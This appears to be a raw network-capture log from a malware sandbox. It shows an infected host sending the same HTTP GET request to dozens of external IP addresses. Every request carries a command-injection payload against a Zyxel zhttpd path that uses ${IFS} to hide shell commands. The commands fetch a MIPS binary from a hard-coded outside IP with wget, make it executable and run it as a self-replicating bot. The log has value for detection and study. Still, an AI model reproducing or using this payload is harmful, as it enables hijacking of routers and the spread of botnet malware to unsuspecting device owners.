                                                Jan 29, 2024 07:07:58.544367075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6890192.168.2.236010899.151.126.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.544420004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6891192.168.2.235468082.78.44.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.544445992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6892192.168.2.233396650.130.124.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.544483900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6893192.168.2.2356056198.67.184.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.544519901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6894192.168.2.235014439.173.114.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.544576883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6895192.168.2.2334174156.59.137.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.544595003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6896192.168.2.2355962162.83.135.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.544656992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6897192.168.2.2346156119.155.176.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.544692039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6898192.168.2.2344420167.239.34.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.544729948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6899192.168.2.2347412222.153.191.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.544770956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6900192.168.2.2359896170.27.188.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.544802904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6901192.168.2.234931468.57.73.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.544847965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6902192.168.2.235883224.125.178.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.544897079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6903192.168.2.2338594197.66.68.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.544951916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6904192.168.2.235465819.51.101.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.544989109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6905192.168.2.235370243.140.37.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.545012951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6906192.168.2.2353740152.66.89.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.545067072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6907192.168.2.235776027.86.84.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.545089006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6908192.168.2.234286468.145.132.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.545150042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6909192.168.2.2339518171.194.56.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.545178890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6910192.168.2.233813883.32.38.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.545219898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6911192.168.2.233590284.86.45.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.545255899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6912192.168.2.235616452.0.146.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.545284986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6913192.168.2.2340652116.105.163.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.545319080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6914192.168.2.234902037.51.46.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.545372963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6915192.168.2.2347094170.35.40.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.545402050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6916192.168.2.2359528119.91.190.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.545437098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6917192.168.2.2346358170.140.211.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.545486927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6918192.168.2.2350128172.155.233.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.545521975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6919192.168.2.2342764143.243.246.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.545563936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6920192.168.2.2334592128.150.124.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.545604944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6921192.168.2.2354190161.145.126.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.545644045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6922192.168.2.2341184206.41.34.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.545670986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6923192.168.2.2352850159.9.39.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.545713902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6924192.168.2.2349270209.134.165.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.545747042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6925192.168.2.2335974182.20.101.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.545782089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6926192.168.2.235716239.164.192.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.545829058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6927192.168.2.2340672199.208.127.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.545855999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6928192.168.2.2349676120.251.206.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.545913935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6929192.168.2.2336078133.42.175.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.545947075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6930192.168.2.234317818.6.31.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.545964003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6931192.168.2.2335494115.88.223.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.546019077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6932192.168.2.2355492193.146.200.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.546066046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6933192.168.2.2347732104.228.37.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.546093941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6934192.168.2.2332866100.0.167.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.546130896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6935192.168.2.2353180204.47.216.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.546205044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6936192.168.2.234414639.221.244.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.546251059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6937192.168.2.2336520154.114.130.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.546279907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6938192.168.2.2348938219.21.94.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.546313047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6939192.168.2.2333418141.182.118.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.546349049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6940192.168.2.2337194128.28.169.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.546375036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6941192.168.2.234863235.105.13.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.546437979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6942192.168.2.234395480.107.247.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.546480894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6943192.168.2.2344802122.67.40.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.546502113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6944192.168.2.2350534216.24.72.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.546561956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6945192.168.2.233615618.184.88.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.546600103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6946192.168.2.2341420205.188.242.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.546653986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6947192.168.2.2346852200.108.84.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.546691895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6948192.168.2.235396865.195.169.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.546736002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6949192.168.2.236056041.55.208.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.546782970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6950192.168.2.23539388.122.40.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.546829939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6951192.168.2.234624286.254.187.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.546868086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6952192.168.2.235790023.177.236.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.546883106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6953192.168.2.234794425.131.150.85443
                                                TimestampBytes transferredDirectionData
